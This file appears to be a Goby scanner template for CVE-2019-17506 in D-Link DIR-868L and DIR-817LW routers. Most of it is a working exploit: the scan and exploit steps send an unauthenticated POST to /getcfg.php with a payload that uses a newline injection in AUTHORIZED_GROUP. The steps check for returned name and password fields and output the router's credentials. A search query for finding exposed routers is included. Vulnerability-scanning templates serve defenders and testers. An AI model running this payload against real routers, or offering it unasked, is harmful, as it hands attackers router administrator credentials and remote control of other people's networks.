Goby/json/Dlink_Info_Leak_CVE_2019_17...

103 lines
4.0 KiB
JSON

{
"Name": "Dlink Info Leak CVE-2019-17506",
"Level": "2",
"Tags": [
"infoleak"
],
"GobyQuery": "app=\"D_Link-Router\"",
"Description": "There are some web interfaces without authentication requirements on D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely.",
"Product": "Dlink",
"Homepage": " http://www.dlink.com.cn/",
"Author": "aetkrad",
"Impact": "",
"Recommendation": "",
"References": [
"https://xz.aliyun.com/t/6453"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/getcfg.php",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "<name>",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "<password>",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/getcfg.php",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"PostTime": "2021-11-26 19:19:16",
"GobyVersion": "1.9.310"
}